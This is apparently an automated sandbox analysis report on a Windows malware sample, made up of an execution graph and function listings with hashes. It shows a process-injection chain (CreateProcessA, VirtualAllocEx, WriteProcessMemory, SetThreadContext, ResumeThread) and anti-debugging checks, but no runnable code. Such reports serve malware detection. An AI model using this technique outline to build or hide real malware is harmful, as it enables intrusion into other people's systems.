                                                                    execution_graph 4607 13bb8bb 4608 13bb8bd 4607->4608 4609 13bb979 4608->4609 4610 13b9c18 SetThreadContext 4608->4610 4611 13b9c20 SetThreadContext 4608->4611 4610->4608 4611->4608 4456 13bba3d 4457 13bba69 4456->4457 4461 13b9d48 4457->4461 4465 13b9d41 4457->4465 4458 13bbaac 4462 13b9d8c VirtualAllocEx 4461->4462 4464 13b9e04 4462->4464 4464->4458 4466 13b9d8c VirtualAllocEx 4465->4466 4468 13b9e04 4466->4468 4468->4458 4596 13bb1f3 4597 13bb1fb 4596->4597 4599 13b9e68 WriteProcessMemory 4597->4599 4600 13b9e61 WriteProcessMemory 4597->4600 4598 13bb236 4599->4598 4600->4598 4469 13bad71 4473 13b9c18 4469->4473 4477 13b9c20 4469->4477 4470 13bad8b 4474 13b9c69 SetThreadContext 4473->4474 4476 13b9ce1 4474->4476 4476->4470 4478 13b9c69 SetThreadContext 4477->4478 4480 13b9ce1 4478->4480 4480->4470 4601 13ba671 4602 13ba67f 4601->4602 4603 13ba663 4601->4603 4605 13bc6a8 2 API calls 4602->4605 4606 13bc6a2 2 API calls 4602->4606 4604 13ba6ee 4605->4604 4606->4604 4481 13bb976 4482 13bb979 4481->4482 4483 13bb913 4481->4483 4483->4481 4484 13b9c18 SetThreadContext 4483->4484 4485 13b9c20 SetThreadContext 4483->4485 4484->4483 4485->4483 4486 13bbf74 4490 13b9e68 4486->4490 4494 13b9e61 4486->4494 4487 13bbf8c 4491 13b9eb4 WriteProcessMemory 4490->4491 4493 13b9f4d 4491->4493 4493->4487 4495 13b9eb4 WriteProcessMemory 4494->4495 4497 13b9f4d 4495->4497 4497->4487 4498 13be728 4499 13be76d FindCloseChangeNotification 4498->4499 4500 13be7b8 4499->4500 4506 13bae4f 4510 13b9b28 4506->4510 4514 13b9b30 4506->4514 4507 13bae64 4511 13b9b74 ResumeThread 4510->4511 4513 13b9bc0 4511->4513 4513->4507 4515 13b9b74 ResumeThread 4514->4515 4517 13b9bc0 4515->4517 4517->4507 4523 13bab42 4524 13bab6a 4523->4524 4528 13b9fb8 4524->4528 4532 13b9fc0 4524->4532 4525 13babc6 4529 13ba00c ReadProcessMemory 4528->4529 4531 13ba084 4529->4531 4531->4525 4533 13ba00c ReadProcessMemory 4532->4533 4535 13ba084 4533->4535 4535->4525 4536 13ba680 4537 13ba6a2 4536->4537 4541 13bc6a8 4537->4541 4548 13bc6a2 4537->4548 4538 13ba6ee 4542 13bc6c4 4541->4542 4555 13bce6a 4542->4555 4559 13bce06 4542->4559 4563 13bc89c 4542->4563 4569 13bc88f 4542->4569 4543 13bc6d9 4543->4538 4549 13bc6a8 4548->4549 4551 13bce6a EnumWindows 4549->4551 4552 13bc88f 2 API calls 4549->4552 4553 13bc89c 2 API calls 4549->4553 4554 13bce06 EnumWindows 4549->4554 4550 13bc6d9 4550->4538 4551->4550 4552->4550 4553->4550 4554->4550 4556 13bcdac 4555->4556 4557 13bcec1 4556->4557 4575 13be9f8 4556->4575 4557->4543 4561 13bce17 4559->4561 4560 13bcec1 4560->4543 4561->4560 4562 13be9f8 EnumWindows 4561->4562 4562->4561 4565 13bc8a8 4563->4565 4564 13bc99b 4564->4543 4565->4564 4566 13bcaa3 4565->4566 4579 13be628 4565->4579 4566->4564 4567 13be9f8 EnumWindows 4566->4567 4567->4566 4571 13bc892 4569->4571 4570 13bcaa3 4572 13bc99b 4570->4572 4573 13be9f8 EnumWindows 4570->4573 4571->4570 4571->4572 4574 13be628 CheckRemoteDebuggerPresent 4571->4574 4572->4543 4573->4570 4574->4571 4576 13bea3c EnumWindows 4575->4576 4578 13beaa3 4576->4578 4578->4556 4580 13be671 CheckRemoteDebuggerPresent 4579->4580 4582 13be6c8 4580->4582 4582->4565 4583 13bac67 4584 13bac9d 4583->4584 4588 13ba1f0 4584->4588 4592 13ba1e4 4584->4592 4589 13ba277 4588->4589 4589->4589 4590 13ba462 CreateProcessA 4589->4590 4591 13ba4cc 4590->4591 4593 13ba277 4592->4593 4593->4593 4594 13ba462 CreateProcessA 4593->4594 4595 13ba4cc 4594->4595

                                                                    Executed Functions

                                                                    Function 013B29F0 Relevance: 6.4, Strings: 5, Instructions: 171COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 13b29f0-13b2a15 1 13b2a1c-13b2a32 0->1 2 13b2a17 0->2 3 13b2a66-13b2a77 1->3 4 13b2a34 1->4 2->1 5 13b2a3b-13b2a57 3->5 4->5 6 13b2a59 5->6 7 13b2a60-13b2a61 5->7 6->3 6->4 6->7 8 13b2a79-13b2a85 6->8 9 13b2abf-13b2aee 6->9 10 13b2bff-13b2c05 6->10 11 13b2af3-13b2afc 6->11 12 13b2c31-13b2c38 6->12 13 13b2bd0-13b2bfa 6->13 14 13b2b8a-13b2b93 6->14 15 13b2b6a-13b2b85 6->15 16 13b2b2f-13b2b65 6->16 17 13b2aa3-13b2aba 6->17 18 13b2bc6-13b2bcd 6->18 7->12 23 13b2a8c 8->23 24 13b2a87 8->24 9->5 19 13b2c18-13b2c1f 10->19 20 13b2c07-13b2c16 10->20 21 13b2b0f-13b2b16 11->21 22 13b2afe-13b2b0d 11->22 13->5 25 13b2ba6-13b2bad 14->25 26 13b2b95-13b2ba4 14->26 15->5 16->5 17->5 28 13b2c26-13b2c2c 19->28 20->28 29 13b2b1d-13b2b2a 21->29 22->29 33 13b2a90 call 13b2c79 23->33 34 13b2a90 call 13b2c88 23->34 24->23 27 13b2bb4-13b2bc1 25->27 26->27 27->5 28->5 29->5 31 13b2a96-13b2aa1 31->5 33->31 34->31
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >2Hp$>2Hp$iV$}.$}.
                                                                    • API String ID: 0-3561281039
                                                                    • Opcode ID: a59cd3ab1f098298d6905fe9e9946e51e8aa6bbcac3a8d4ba6da6c36554620b9
                                                                    • Instruction ID: 1a234646cdf4a2660f675ee1ced49aa25f261488f97dcf04bec0592096e7dc71
                                                                    • Opcode Fuzzy Hash: a59cd3ab1f098298d6905fe9e9946e51e8aa6bbcac3a8d4ba6da6c36554620b9
                                                                    • Instruction Fuzzy Hash: 1F7129B4E05209DFDB04CF95D4809EEFBB6FB88350F14C626DA15AB654E734AA42CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B29E0 Relevance: 6.4, Strings: 5, Instructions: 166COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 35 13b29e0-13b2a15 36 13b2a1c-13b2a32 35->36 37 13b2a17 35->37 38 13b2a66-13b2a77 36->38 39 13b2a34 36->39 37->36 40 13b2a3b-13b2a57 38->40 39->40 41 13b2a59 40->41 42 13b2a60-13b2a61 40->42 41->38 41->39 41->42 43 13b2a79-13b2a85 41->43 44 13b2abf-13b2aee 41->44 45 13b2bff-13b2c05 41->45 46 13b2af3-13b2afc 41->46 47 13b2c31-13b2c38 41->47 48 13b2bd0-13b2bfa 41->48 49 13b2b8a-13b2b93 41->49 50 13b2b6a-13b2b85 41->50 51 13b2b2f-13b2b65 41->51 52 13b2aa3-13b2aba 41->52 53 13b2bc6-13b2bcd 41->53 42->47 58 13b2a8c 43->58 59 13b2a87 43->59 44->40 54 13b2c18-13b2c1f 45->54 55 13b2c07-13b2c16 45->55 56 13b2b0f-13b2b16 46->56 57 13b2afe-13b2b0d 46->57 48->40 60 13b2ba6-13b2bad 49->60 61 13b2b95-13b2ba4 49->61 50->40 51->40 52->40 63 13b2c26-13b2c2c 54->63 55->63 64 13b2b1d-13b2b2a 56->64 57->64 68 13b2a90 call 13b2c79 58->68 69 13b2a90 call 13b2c88 58->69 59->58 62 13b2bb4-13b2bc1 60->62 61->62 62->40 63->40 64->40 66 13b2a96-13b2aa1 66->40 68->66 69->66
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >2Hp$>2Hp$iV$}.$}.
                                                                    • API String ID: 0-3561281039
                                                                    • Opcode ID: 232ac459d57dcc32556eeb771747e66f5053ddb87c7488d925e74a1be95e9ec3
                                                                    • Instruction ID: b0031b9b9c5850482764b0febf5856b191275e50be4da4dc7417594e608afa3c
                                                                    • Opcode Fuzzy Hash: 232ac459d57dcc32556eeb771747e66f5053ddb87c7488d925e74a1be95e9ec3
                                                                    • Instruction Fuzzy Hash: 846129B5E0420A9FDB04CF95D4809EEFBB2FB89310F14C52ADA15A7654E734AA42CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BC88F Relevance: 3.0, Strings: 2, Instructions: 502COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 180 13bc88f-13bc892 182 13bc8a8-13bc8aa 180->182 183 13bc8af-13bc8cb 182->183 184 13bc8cd 183->184 185 13bc8d4-13bc8d5 183->185 184->182 186 13bc99b-13bc99c 184->186 187 13bc8da-13bc924 call 13b9330 call 13b846c 184->187 188 13bcad8-13bcb06 call 13b9330 call 13b8484 184->188 189 13bc9fe-13bca05 184->189 190 13bcb73-13bcb90 call 13b8490 184->190 191 13bcb95-13bcb9c 184->191 192 13bcc34-13bcc60 184->192 193 13bcb0b-13bcb27 184->193 194 13bca6b-13bca72 184->194 195 13bc96f-13bc976 184->195 196 13bcb2c-13bcb31 184->196 197 13bcaa3-13bcabb 184->197 198 13bc9a1 184->198 199 13bca81-13bca9e 184->199 200 13bca47-13bca66 184->200 201 13bc926-13bc93c 184->201 202 13bc985-13bc98c 184->202 185->187 185->191 210 13bd14a-13bd152 186->210 187->183 188->183 213 13bca1e-13bca28 189->213 214 13bca07-13bca1c 189->214 191->191 212 13bcb9e-13bcbd0 call 13b9330 call 13b849c 191->212 228 13bcbdd-13bcbf9 192->228 193->210 194->194 203 13bca74-13bca7c 194->203 195->195 206 13bc978-13bc980 195->206 208 13bcb4a-13bcb54 196->208 209 13bcb33-13bcb48 196->209 230 13bcdac-13bcdf7 call 13b84a8 197->230 231 13bcac1-13bcad3 197->231 224 13bc9ac-13bc9f9 call 13b8478 198->224 199->183 200->183 233 13bc94f-13bc956 201->233 234 13bc93e-13bc94d 201->234 202->202 207 13bc98e-13bc996 202->207 206->183 207->183 223 13bcb5e-13bcb6e 208->223 209->223 250 13bcbd6 212->250 215 13bca32-13bca42 213->215 214->215 241 13bcbfb 228->241 242 13bcc02-13bcc03 228->242 315 13bcdfc-13bce32 230->315 238 13bc95d-13bc96a 233->238 234->238 238->183 241->192 243 13bcc1b-13bcc2f 241->243 244 13bcd1b-13bcd1f 241->244 245 13bce79-13bce80 241->245 246 13bce38 241->246 247 13bcc9f-13bccb2 call 13be628 241->247 248 13bcef3 241->248 249 13bcd52-13bcd7f 241->249 241->250 251 13bcc08-13bcc0f 241->251 252 13bccef-13bccf6 241->252 253 13bce8f-13bcebf 241->253 254 13bcfa3-13bcfaa 241->254 255 13bcfc2-13bd007 call 13b9330 call 13b84b4 241->255 256 13bcec1-13bcec2 241->256 257 13bcd05-13bcd0c 241->257 258 13bcc65-13bcc6c 241->258 259 13bcd84-13bcd98 241->259 242->251 242->259 265 13bcd9a-13bcd9d call 13b84a8 243->265 271 13bcd32-13bcd39 244->271 272 13bcd21-13bcd30 244->272 245->245 263 13bce82-13bce8d 245->263 276 13bce42-13bce61 246->276 282 13bccb4-13bccbc 247->282 266 13bcefd-13bcf1c 248->266 249->228 250->228 251->251 264 13bcc11-13bcc19 251->264 252->252 269 13bccf8-13bcd00 252->269 253->276 254->254 273 13bcfac-13bcfb7 254->273 312 13bd009-13bd01e 255->312 313 13bd020-13bd02a 255->313 256->210 257->257 270 13bcd0e-13bcd16 257->270 267 13bcc7f-13bcc86 258->267 268 13bcc6e-13bcc7d 258->268 259->265 263->276 264->228 299 13bcda2-13bcda9 265->299 278 13bcf1e 266->278 279 13bcf25-13bcf26 266->279 280 13bcc8d-13bcc9a 267->280 268->280 269->228 270->228 283 13bcd40-13bcd4d 271->283 272->283 273->266 287 13bce63 276->287 288 13bce76-13bce77 276->288 278->248 278->254 278->255 289 13bcfbc-13bcfbd 278->289 290 13bd0b7-13bd0be 278->290 291 13bcf2b-13bcf67 call 13be9f8 278->291 292 13bcf8a-13bcf91 278->292 293 13bd04c-13bd07d 278->293 294 13bd103-13bd140 278->294 295 13bd082-13bd0b2 278->295 279->291 279->294 280->228 296 13bcccf-13bccd6 282->296 297 13bccbe-13bcccd 282->297 283->228 287->245 287->246 287->248 287->253 287->254 287->255 287->256 287->289 287->290 287->291 287->292 287->293 287->294 287->295 288->245 288->256 289->210 300 13bd0c0-13bd0d5 290->300 301 13bd0d7-13bd0e1 290->301 321 13bcf69-13bcf85 291->321 292->292 305 13bcf93-13bcf9e 292->305 293->266 295->266 304 13bccdd-13bccea 296->304 297->304 299->246 309 13bd0eb-13bd0fe 300->309 301->309 304->228 305->266 309->266 316 13bd034-13bd047 312->316 313->316 315->246 320 13bcec7-13bcef0 call 13b9330 call 13b8484 315->320 316->266 320->248 321->266
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 9[5-$9[5-
                                                                    • API String ID: 0-333148375
                                                                    • Opcode ID: 5d2870cc0fdef26875438ed4fe580da20a57d646c2e26d56026a7e5e0a4f4460
                                                                    • Instruction ID: f30fcc72057ebc7f43ceba50d3fc0d357495bf070fb49fb11e53c49f1ac4375a
                                                                    • Opcode Fuzzy Hash: 5d2870cc0fdef26875438ed4fe580da20a57d646c2e26d56026a7e5e0a4f4460
                                                                    • Instruction Fuzzy Hash: 55223974D0921DCFDB64CFA4D9807EDBBB5BB49308F10A0AAD609B7A50E7349A81CF11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BC89C Relevance: 2.9, Strings: 2, Instructions: 448COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 328 13bc89c-13bc8a7 329 13bc8a8-13bc8aa 328->329 330 13bc8af-13bc8cb 329->330 331 13bc8cd 330->331 332 13bc8d4-13bc8d5 330->332 331->329 333 13bc99b-13bc99c 331->333 334 13bc8da-13bc924 call 13b9330 call 13b846c 331->334 335 13bcad8-13bcb06 call 13b9330 call 13b8484 331->335 336 13bc9fe-13bca05 331->336 337 13bcb73-13bcb90 call 13b8490 331->337 338 13bcb95-13bcb9c 331->338 339 13bcc34-13bcc60 331->339 340 13bcb0b-13bcb27 331->340 341 13bca6b-13bca72 331->341 342 13bc96f-13bc976 331->342 343 13bcb2c-13bcb31 331->343 344 13bcaa3-13bcabb 331->344 345 13bc9a1 331->345 346 13bca81-13bca9e 331->346 347 13bca47-13bca66 331->347 348 13bc926-13bc93c 331->348 349 13bc985-13bc98c 331->349 332->334 332->338 357 13bd14a-13bd152 333->357 334->330 335->330 360 13bca1e-13bca28 336->360 361 13bca07-13bca1c 336->361 338->338 359 13bcb9e-13bcbd0 call 13b9330 call 13b849c 338->359 375 13bcbdd-13bcbf9 339->375 340->357 341->341 350 13bca74-13bca7c 341->350 342->342 353 13bc978-13bc980 342->353 355 13bcb4a-13bcb54 343->355 356 13bcb33-13bcb48 343->356 377 13bcdac-13bcdf7 call 13b84a8 344->377 378 13bcac1-13bcad3 344->378 371 13bc9ac-13bc9f9 call 13b8478 345->371 346->330 347->330 380 13bc94f-13bc956 348->380 381 13bc93e-13bc94d 348->381 349->349 354 13bc98e-13bc996 349->354 353->330 354->330 370 13bcb5e-13bcb6e 355->370 356->370 397 13bcbd6 359->397 362 13bca32-13bca42 360->362 361->362 388 13bcbfb 375->388 389 13bcc02-13bcc03 375->389 462 13bcdfc-13bce32 377->462 385 13bc95d-13bc96a 380->385 381->385 385->330 388->339 390 13bcc1b-13bcc2f 388->390 391 13bcd1b-13bcd1f 388->391 392 13bce79-13bce80 388->392 393 13bce38 388->393 394 13bcc9f-13bccb2 call 13be628 388->394 395 13bcef3 388->395 396 13bcd52-13bcd7f 388->396 388->397 398 13bcc08-13bcc0f 388->398 399 13bccef-13bccf6 388->399 400 13bce8f-13bcebf 388->400 401 13bcfa3-13bcfaa 388->401 402 13bcfc2-13bd007 call 13b9330 call 13b84b4 388->402 403 13bcec1-13bcec2 388->403 404 13bcd05-13bcd0c 388->404 405 13bcc65-13bcc6c 388->405 406 13bcd84-13bcd98 388->406 389->398 389->406 412 13bcd9a-13bcd9d call 13b84a8 390->412 418 13bcd32-13bcd39 391->418 419 13bcd21-13bcd30 391->419 392->392 410 13bce82-13bce8d 392->410 423 13bce42-13bce61 393->423 429 13bccb4-13bccbc 394->429 413 13bcefd-13bcf1c 395->413 396->375 397->375 398->398 411 13bcc11-13bcc19 398->411 399->399 416 13bccf8-13bcd00 399->416 400->423 401->401 420 13bcfac-13bcfb7 401->420 459 13bd009-13bd01e 402->459 460 13bd020-13bd02a 402->460 403->357 404->404 417 13bcd0e-13bcd16 404->417 414 13bcc7f-13bcc86 405->414 415 13bcc6e-13bcc7d 405->415 406->412 410->423 411->375 446 13bcda2-13bcda9 412->446 425 13bcf1e 413->425 426 13bcf25-13bcf26 413->426 427 13bcc8d-13bcc9a 414->427 415->427 416->375 417->375 430 13bcd40-13bcd4d 418->430 419->430 420->413 434 13bce63 423->434 435 13bce76-13bce77 423->435 425->395 425->401 425->402 436 13bcfbc-13bcfbd 425->436 437 13bd0b7-13bd0be 425->437 438 13bcf2b-13bcf67 call 13be9f8 425->438 439 13bcf8a-13bcf91 425->439 440 13bd04c-13bd07d 425->440 441 13bd103-13bd140 425->441 442 13bd082-13bd0b2 425->442 426->438 426->441 427->375 443 13bcccf-13bccd6 429->443 444 13bccbe-13bcccd 429->444 430->375 434->392 434->393 434->395 434->400 434->401 434->402 434->403 434->436 434->437 434->438 434->439 434->440 434->441 434->442 435->392 435->403 436->357 447 13bd0c0-13bd0d5 437->447 448 13bd0d7-13bd0e1 437->448 468 13bcf69-13bcf85 438->468 439->439 452 13bcf93-13bcf9e 439->452 440->413 442->413 451 13bccdd-13bccea 443->451 444->451 446->393 456 13bd0eb-13bd0fe 447->456 448->456 451->375 452->413 456->413 463 13bd034-13bd047 459->463 460->463 462->393 467 13bcec7-13bcef0 call 13b9330 call 13b8484 462->467 463->413 467->395 468->413
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: /R_$/R_
                                                                    • API String ID: 0-3495763888
                                                                    • Opcode ID: e107489272454f97db0f7aaa599469a68f5deb869c363b921a6d4bdd3ead0ade
                                                                    • Instruction ID: 4264c3e301d2234760bc512584585724c5f7d6b528b1d7746008023f4b360841
                                                                    • Opcode Fuzzy Hash: e107489272454f97db0f7aaa599469a68f5deb869c363b921a6d4bdd3ead0ade
                                                                    • Instruction Fuzzy Hash: 63123A74E0521DCFDB64CFA4D9807EDBBB5EB89304F10A4AAD609B7A50E7349A85CF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B3EC0 Relevance: 2.8, Strings: 2, Instructions: 296COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 475 13b3ec0-13b3ee5 476 13b3eec-13b3f09 475->476 477 13b3ee7 475->477 478 13b3f11 476->478 477->476 479 13b3f18-13b3f34 478->479 480 13b3f3d-13b3f3e 479->480 481 13b3f36 479->481 495 13b42e4-13b42eb 480->495 481->478 481->480 482 13b40bb-13b40c8 481->482 483 13b3f7f-13b3f8b 481->483 484 13b41fc-13b4208 481->484 485 13b427c-13b428e 481->485 486 13b3fb3-13b3fca 481->486 487 13b4032-13b403b 481->487 488 13b4230-13b4234 481->488 489 13b42ad-13b42b9 481->489 490 13b41a3-13b41c3 481->490 491 13b4260-13b4277 481->491 492 13b4067-13b4073 481->492 493 13b40e7-13b40eb 481->493 494 13b3fe6-13b3ffd 481->494 481->495 496 13b4293-13b42a8 481->496 497 13b4091-13b409d 481->497 498 13b4117-13b412e 481->498 499 13b41c8-13b41d4 481->499 500 13b3fcf-13b3fe1 481->500 501 13b414d-13b4165 481->501 502 13b40cd-13b40e2 481->502 503 13b3f43-13b3f7d 481->503 504 13b4002-13b4006 481->504 482->479 507 13b3f8d 483->507 508 13b3f92-13b3fae 483->508 525 13b420a 484->525 526 13b420f-13b422b 484->526 485->479 486->479 517 13b404e-13b4055 487->517 518 13b403d-13b404c 487->518 509 13b4247-13b424e 488->509 510 13b4236-13b4245 488->510 513 13b42bb 489->513 514 13b42c0-13b42df 489->514 490->479 491->479 519 13b407a-13b408c 492->519 520 13b4075 492->520 505 13b40fe-13b4105 493->505 506 13b40ed-13b40fc 493->506 494->479 496->479 523 13b409f 497->523 524 13b40a4-13b40b6 497->524 546 13b4130 call 13b44e0 498->546 547 13b4130 call 13b44d0 498->547 521 13b41db-13b41f7 499->521 522 13b41d6 499->522 500->479 511 13b416c-13b4182 501->511 512 13b4167 501->512 502->479 503->479 515 13b4019-13b4020 504->515 516 13b4008-13b4017 504->516 527 13b410c-13b4112 505->527 506->527 507->508 508->479 531 13b4255-13b425b 509->531 510->531 541 13b4189-13b419e 511->541 542 13b4184 511->542 512->511 513->514 514->479 532 13b4027-13b402d 515->532 516->532 533 13b405c-13b4062 517->533 518->533 519->479 520->519 521->479 522->521 523->524 524->479 525->526 526->479 527->479 528 13b4136-13b4148 528->479 531->479 532->479 533->479 541->479 542->541 546->528 547->528
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c~]S$c~]S
                                                                    • API String ID: 0-1290760039
                                                                    • Opcode ID: da9e8bc33374747df0f21d659b77bdbc2553eb5174436fb3e7f0b319f4233a1a
                                                                    • Instruction ID: 6b3de24a2d1e2ebb0cab425ffe6351c1486a53272201c93819dd3c1d375a46fc
                                                                    • Opcode Fuzzy Hash: da9e8bc33374747df0f21d659b77bdbc2553eb5174436fb3e7f0b319f4233a1a
                                                                    • Instruction Fuzzy Hash: 17D199B4E0061ADFCB04CF96D5808AEFBB2FF89304F54C519D606AB654E734AA46CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BE628 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 013BE6B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: CheckDebuggerPresentRemote
                                                                    • String ID:
                                                                    • API String ID: 3662101638-0
                                                                    • Opcode ID: 0c2c23e28cafb5dc946827dd11b35ffb8e72b8a17751aa5a06199fb7c4a754fe
                                                                    • Instruction ID: 4e4daae6cd82d7a1e92748ad80cceedd4889f4d41855e711ea37fe253cf1d3a2
                                                                    • Opcode Fuzzy Hash: 0c2c23e28cafb5dc946827dd11b35ffb8e72b8a17751aa5a06199fb7c4a754fe
                                                                    • Instruction Fuzzy Hash: E431B6B9D012189FCB10CFAAD880ADEFBB5BB48324F10842AE805B7700D734A9458FA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B2550 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: sq
                                                                    • API String ID: 0-161166840
                                                                    • Opcode ID: cd67d4c547824528be5d2521b55f243f58952127b290d3b8b3370dee7332ce9f
                                                                    • Instruction ID: 52535730f9aea221473d678810e9730ef7f9b5b4211b65c623f41d73554b9808
                                                                    • Opcode Fuzzy Hash: cd67d4c547824528be5d2521b55f243f58952127b290d3b8b3370dee7332ce9f
                                                                    • Instruction Fuzzy Hash: 83513AB0E04209CFCB08CFAAC5846EEFBF2EF89304F14D52AD516A7654E7349A418F95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B6AA9 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PE
                                                                    • API String ID: 0-650672642
                                                                    • Opcode ID: 4eb1f09a641a68bd81a221883b0527643f20e365ecfd1022f3720af2e051f2d8
                                                                    • Instruction ID: 7b71edbfe77a38073caa6a5b0e3505fd8a9ef5fae1fd6908e7781a7af610ab0e
                                                                    • Opcode Fuzzy Hash: 4eb1f09a641a68bd81a221883b0527643f20e365ecfd1022f3720af2e051f2d8
                                                                    • Instruction Fuzzy Hash: 085137B4E012098FDF04CFAAE4819EEBBB6FF85304F14902AD505B7755EB309A01CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BA671 Relevance: .3, Instructions: 301COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 59996310bc607089a85d4dfddf39f0a3179b26bbd61065c630d7449c4c2df787
                                                                    • Instruction ID: 6570f04a00a88347e9cd4a73556b81e5cd37dee13a970fea18b751349ed31040
                                                                    • Opcode Fuzzy Hash: 59996310bc607089a85d4dfddf39f0a3179b26bbd61065c630d7449c4c2df787
                                                                    • Instruction Fuzzy Hash: DAD12974E152298FCB65CF65C880BDEB7B6AF99304F00A5EA960DB7640EB345B858F40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BA680 Relevance: .3, Instructions: 301COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c2fed083103f669a950ffc24ae41be1d76ae9d12ce7af8b33da2ec14b975905
                                                                    • Instruction ID: b1eea8d66aa95c44678013da910c340ec653755893f60f9453d001c1edcd11ab
                                                                    • Opcode Fuzzy Hash: 0c2fed083103f669a950ffc24ae41be1d76ae9d12ce7af8b33da2ec14b975905
                                                                    • Instruction Fuzzy Hash: 4BD11974E152298FDB65CF65C8807DEB7B6AF9A304F00A5E9960DB7640EB345B818F40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BAA85 Relevance: .3, Instructions: 281COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40fadaa43a7139bfa9f6d72ad9def9fdcd707cce32c4395b013d7f01e44d5506
                                                                    • Instruction ID: 3a067abf8f0b5aa3395616342b76b0fb6ebaf4d63bf464f24bb31cd912e3bf7a
